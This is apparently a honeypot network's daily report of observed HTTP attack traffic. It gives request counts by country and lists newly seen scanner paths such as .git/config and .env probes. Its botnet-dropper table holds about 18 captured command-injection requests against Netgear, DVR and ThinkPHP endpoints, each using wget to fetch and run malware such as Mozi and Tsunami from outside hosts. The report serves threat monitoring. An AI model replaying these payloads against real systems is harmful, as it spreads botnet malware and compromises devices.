Daily Report: 2025-04-04#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 18 stage 1 IP address(es), linked to 7 dropper URL(s).
There are 155 new requests that have never been observed before (these were added to the monitored request database.).
A total of 2998 requests were recorded during the day, originating from 18 different countries, with a peak of 1019 requests coming from NL.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
SC | Germany |
SC | Germany |
US | Dubai |
US | Dubai |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
185.191.127.222 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=wget%20http%3A%2F%2F45.87.43.37%2Ftbk%20-O-%20%7C%20sh HTTP/1.1 |
31.170.22.205 | GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/tmp;wget+http://31.170.22.205/dl18;busybox+wget+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1 |
103.207.124.41 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.207.124.41:46234/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
185.197.140.156 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://185.197.140.156:52968/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
114.76.203.37 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
58.58.30.134 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
181.170.159.56 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
87.107.80.243 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1 |
90.214.52.113 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
162.221.50.82 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
207.188.188.206 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
58.96.82.116 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
79.116.24.116 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
90.248.112.248 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
211.72.164.193 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
140.207.30.37 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
36.27.117.227 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
81.86.131.239 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
92 | 5 | GET /splarm6 HTTP/1.1 |
96 | 4 | GET /check HTTP/1.1 |
283 | 2 | GET /.s3cfg HTTP/1.1 |
298 | 2 | GET /arm6.nn HTTP/1.1 |
299 | 2 | GET /m68k.nn HTTP/1.1 |
341 | 2 | GET /crm/.env.production HTTP/1.1 |
531 | 1 | GET /static/.git/config HTTP/1.1 |
536 | 1 | GET /IOebhLMhl1CTbFHbL95myfRX2 HTTP/1.1 |
537 | 1 | GET /agSearch/SQlite/users/users/users/users/users/login HTTP/1.1 |
538 | 1 | GET /agSearch/SQlite/users/users/users/users/login HTTP/1.1 |
539 | 1 | GET /agSearch/SQlite/users/users/users/login HTTP/1.1 |
540 | 1 | GET /agSearch/SQlite/users/users/login HTTP/1.1 |
541 | 1 | GET /SQLiteManager/users/users/users/users/users/login HTTP/1.1 |
542 | 1 | GET /SQLite/main.php HTTP/1.1 |
543 | 1 | GET /SQLite/users/login HTTP/1.1 |
544 | 1 | GET /SQLite/users/users/login HTTP/1.1 |
545 | 1 | GET /SQLite/users/users/users/login HTTP/1.1 |
546 | 1 | GET /SQLite/users/users/users/users/login HTTP/1.1 |
547 | 1 | GET /SQLite/users/users/users/users/users/login HTTP/1.1 |
548 | 1 | GET /SQlite/main.php HTTP/1.1 |
549 | 1 | GET /SQlite/users/login HTTP/1.1 |
550 | 1 | GET /SQlite/users/users/login HTTP/1.1 |
551 | 1 | GET /SQlite/users/users/users/login HTTP/1.1 |
552 | 1 | GET /SQlite/users/users/users/users/login HTTP/1.1 |
553 | 1 | GET /SQlite/users/users/users/users/users/login HTTP/1.1 |
555 | 1 | GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1 |
556 | 1 | GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/login HTTP/1.1 |
557 | 1 | GET /testing/.git/config HTTP/1.1 |
564 | 1 | GET /protected/.git/config HTTP/1.1 |
565 | 1 | GET /sources/.git/config HTTP/1.1 |
566 | 1 | GET /stage/.git/config HTTP/1.1 |
567 | 1 | GET //.git/config HTTP/1.1 |
568 | 1 | GET /blog/wp-content/themes/.git/config HTTP/1.1 |
569 | 1 | GET /samples/.git/config HTTP/1.1 |
570 | 1 | GET /git/.git/config HTTP/1.1 |
571 | 1 | GET /live/.git/config HTTP/1.1 |
572 | 1 | GET /wiki/.git/config HTTP/1.1 |
578 | 1 | GET /misc/.git/config HTTP/1.1 |
579 | 1 | GET /mobile/.git/config HTTP/1.1 |
580 | 1 | GET /private/.git/config HTTP/1.1 |
581 | 1 | GET /styles/.git/config HTTP/1.1 |
582 | 1 | GET /libraries/.git/config HTTP/1.1 |
583 | 1 | GET /magento/.git/config HTTP/1.1 |
584 | 1 | GET /mail/.git/config HTTP/1.1 |
585 | 1 | GET /node_modules/.git/config HTTP/1.1 |
586 | 1 | GET /projects/.git/config HTTP/1.1 |
587 | 1 | GET /release/.git/config HTTP/1.1 |
588 | 1 | GET /services/.git/config HTTP/1.1 |
589 | 1 | GET /old/.git/config HTTP/1.1 |
590 | 1 | GET /old-site/.git/config HTTP/1.1 |
591 | 1 | GET /plugins/.git/config HTTP/1.1 |
592 | 1 | GET /portal/.git/config HTTP/1.1 |
593 | 1 | GET /resources/.git/config HTTP/1.1 |
594 | 1 | GET /uploads/.git/config HTTP/1.1 |
595 | 1 | GET /system/.git/config HTTP/1.1 |
596 | 1 | GET /legacy/.git/config HTTP/1.1 |
597 | 1 | GET /maintenance/.git/config HTTP/1.1 |
598 | 1 | GET /member/.git/config HTTP/1.1 |
600 | 1 | GET /tmp/.git/config HTTP/1.1 |
601 | 1 | GET /platform/.git/config HTTP/1.1 |
602 | 1 | GET /sites/.git/config HTTP/1.1 |
603 | 1 | GET /themes/.git/config HTTP/1.1 |
625 | 1 | GET /laravel/.git/config HTTP/1.1 |
626 | 1 | GET /resource/.git/config HTTP/1.1 |
627 | 1 | GET /secure/.git/config HTTP/1.1 |
628 | 1 | GET /storage/.git/config HTTP/1.1 |
629 | 1 | GET /js/.git/config HTTP/1.1 |
630 | 1 | GET /login/.git/config HTTP/1.1 |
631 | 1 | GET /main/.git/config HTTP/1.1 |
632 | 1 | GET /php/.git/config HTTP/1.1 |
634 | 1 | GET /support/.git/config HTTP/1.1 |
648 | 1 | GET /migrations/.git/config HTTP/1.1 |
649 | 1 | GET /panel/.git/config HTTP/1.1 |
650 | 1 | GET /partners/.git/config HTTP/1.1 |
678 | 1 | GET /odinhttpcall1743775311 HTTP/1.1 |
694 | 1 | GET /OdinHttpCall1743775311 HTTP/1.1 |
695 | 1 | GET /Odin/http/call1743775311 HTTP/1.1 |
720 | 1 | \x80\x00\x00(\xCA\xFE\xCA\xFE\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xA5\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
721 | 1 | \x00\x0E\x08\x02\x00\xDC\x80 |
722 | 1 | GET /managemen%74; HTTP/1.1 |
724 | 1 | \x00\x0E\x08\x88\x03J\x1Ak]\xA6x\x00\x00\x00\x00\x00 |
725 | 1 | \x00\x0E8\x88\x03J\x1Ak]\xA6x\x00\x00\x00\x00\x00 |
736 | 1 | GET /web/.git/config HTTP/1.1 |
737 | 1 | GET /common/.git/config HTTP/1.1 |
738 | 1 | GET /repos/.git/config HTTP/1.1 |
739 | 1 | GET /repository/.git/config HTTP/1.1 |
740 | 1 | GET /s3/.git/config HTTP/1.1 |
744 | 1 | POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1 |
752 | 1 | GET /dot.git/config HTTP/1.1 |
753 | 1 | GET /wp-content/themes/.git/config HTTP/1.1 |
754 | 1 | GET /store/.git/config HTTP/1.1 |
759 | 1 | GET /odinhttpcall1743722111 HTTP/1.1 |
760 | 1 | GET /OdinHttpCall1743722111 HTTP/1.1 |
761 | 1 | GET /Odin/http/call1743722111 HTTP/1.1 |
764 | 1 | POST /php/ping.php HTTP/1.1 |
765 | 1 | GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/users/users/users/login HTTP/1.1 |
766 | 1 | GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/users/users/users/users/login HTTP/1.1 |
767 | 1 | GET /SQLiteManager-1.2.4/main.php HTTP/1.1 |
784 | 1 | GET /database/.git/config HTTP/1.1 |
785 | 1 | GET /flock/.git/config HTTP/1.1 |
786 | 1 | GET /m/.git/config HTTP/1.1 |
787 | 1 | GET /prod.git/config HTTP/1.1 |
788 | 1 | GET /aomanalyzer/.git/config HTTP/1.1 |
789 | 1 | GET /blog/.git/config HTTP/1.1 |
790 | 1 | GET /managemen%74;/actuator; HTTP/1.1 |
795 | 1 | GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/users/login HTTP/1.1 |
796 | 1 | GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/users/users/login HTTP/1.1 |
798 | 1 | GET /C:/Users/Arkadi_PC/Downloads/kali-wordlists/dirb/big.txt HTTP/1.1 |
805 | 1 | GET /hudson/script HTTP/1.1 |
806 | 1 | GET /hudson/users/login HTTP/1.1 |
807 | 1 | GET /hudson/users/users/login HTTP/1.1 |
808 | 1 | GET /hudson/users/users/users/login HTTP/1.1 |
809 | 1 | GET /hudson/users/users/users/users/login HTTP/1.1 |
810 | 1 | GET /hudson/users/users/users/users/users/login HTTP/1.1 |
811 | 1 | GET /script HTTP/1.1 |
812 | 1 | GET /sqlite/main.php HTTP/1.1 |
813 | 1 | GET /sqlite/users/login HTTP/1.1 |
816 | 1 | GET /sqlite/users/users/users/users/login HTTP/1.1 |
817 | 1 | GET /sqlite/users/users/users/users/users/login HTTP/1.1 |
818 | 1 | GET /sqlitemanager/main.php HTTP/1.1 |
819 | 1 | GET /sqlitemanager/users/login HTTP/1.1 |
820 | 1 | GET /sqlitemanager/users/users/login HTTP/1.1 |
821 | 1 | GET /sqlitemanager/users/users/users/login HTTP/1.1 |
822 | 1 | GET /sqlitemanager/users/users/users/users/login HTTP/1.1 |
823 | 1 | GET /sqlitemanager/users/users/users/users/users/login HTTP/1.1 |
824 | 1 | GET /SQLiteManager/main.php HTTP/1.1 |
825 | 1 | GET /SQLiteManager/users/login HTTP/1.1 |
826 | 1 | GET /SQLiteManager/users/users/login HTTP/1.1 |
827 | 1 | GET /SQLiteManager/users/users/users/login HTTP/1.1 |
828 | 1 | GET /SQLiteManager/users/users/users/users/login HTTP/1.1 |
829 | 1 | GET /agSearch/SQlite/users/login HTTP/1.1 |
830 | 1 | GET /wp-includes/js/.git/config HTTP/1.1 |
831 | 1 | GET /a/.git/config HTTP/1.1 |
832 | 1 | GET /shop/.git/config HTTP/1.1 |
833 | 1 | GET /wp-content/.git/config HTTP/1.1 |
834 | 1 | GET /__macosx/.git/config HTTP/1.1 |
835 | 1 | GET /awsconf.git/config HTTP/1.1 |
836 | 1 | GET /beta/.git/config HTTP/1.1 |
837 | 1 | GET /application/.git/config HTTP/1.1 |
838 | 1 | GET /wp-content/plugins/.git/config HTTP/1.1 |
839 | 1 | GET /.git/configf HTTP/1.1 |
840 | 1 | GET /amphtml/.git/config HTTP/1.1 |
841 | 1 | GET /new/.git/config HTTP/1.1 |
842 | 1 | GET /old-cuburn/.git/config HTTP/1.1 |
844 | 1 | GET /developer/.git/config HTTP/1.1 |
851 | 1 | GET /qa/.git/config HTTP/1.1 |
852 | 1 | GET /vendor/.git/config HTTP/1.1 |
853 | 1 | GET /demo/.git/config HTTP/1.1 |
854 | 1 | GET /site/.git/config HTTP/1.1 |
855 | 1 | GET /SQLiteManager-1.2.4/users/login HTTP/1.1 |
856 | 1 | GET /SQLiteManager-1.2.4/users/users/login HTTP/1.1 |
857 | 1 | GET /SQLiteManager-1.2.4/users/users/users/login HTTP/1.1 |
858 | 1 | GET /SQLiteManager-1.2.4/users/users/users/users/login HTTP/1.1 |
859 | 1 | GET /SQLiteManager-1.2.4/users/users/users/users/users/login HTTP/1.1 |
860 | 1 | GET /agSearch/SQlite/main.php HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 1019 | NL |
1 | 405 | BG |
2 | 342 | SC |
3 | 237 | GB |
4 | 202 | US |
5 | 174 | HK |
6 | 130 | DE |
7 | 84 | IL |
8 | 63 | PL |
9 | 51 | TW |
10 | 47 | AZ |
11 | 43 | CN |
12 | 35 | CA |
13 | 22 | IN |
14 | 19 | NO |
15 | 19 | FR |
16 | 17 | JP |
17 | 12 | NG |
18 | 10 | KR |
19 | 6 | IT |
20 | 6 | BE |
21 | 5 | LV |
22 | 5 | AU |
23 | 4 | CH |
24 | 4 | ZA |
25 | 4 | ID |
26 | 4 | RU |
27 | 4 | AR |
28 | 4 | PT |
29 | 3 | ES |
30 | 3 | VN |
31 | 3 | UA |
32 | 2 | BR |
33 | 2 | LT |
34 | 1 | RO |
35 | 1 | SI |
36 | 1 | MK |
37 | 1 | SE |
38 | 1 | PK |
39 | 1 | AE |
40 | 1 | IR |
41 | 1 | CZ |